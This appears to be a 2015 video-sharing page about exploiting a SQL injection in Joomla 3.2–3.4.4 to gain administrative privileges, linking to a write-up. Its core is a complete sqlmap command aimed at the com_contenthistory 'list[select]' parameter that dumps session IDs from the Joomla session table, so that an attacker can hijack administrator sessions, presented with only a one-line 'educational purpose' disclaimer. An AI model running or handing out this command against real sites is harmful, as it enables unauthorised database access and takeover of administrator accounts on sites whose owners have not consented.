Videos
Published on October 24th, 2015 📆 | 6614 Views ⚑
0Joomla 3.2 – 3.4.4 (Exploiting Sql Injection to gain administrative privileges)
iSpeech
http://whwriteups.blogspot.in/2015/10/joomla-32-344-sql-injection-leads-to.html
Error Based Sql Injection via sqlmap
option=com_contenthistory&view=history
SQLMAP COMMAND:
sqlmap -u "http://[affected url]/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&list[select]=" --threads=10 --dbms=MYSQL --tamper=apostrophemask --technique=E -D joomlab -T anz91_session -C session_id --dump
Note: This video is only for educational purpose.
2015-10-24 14:03:39
source
Gloss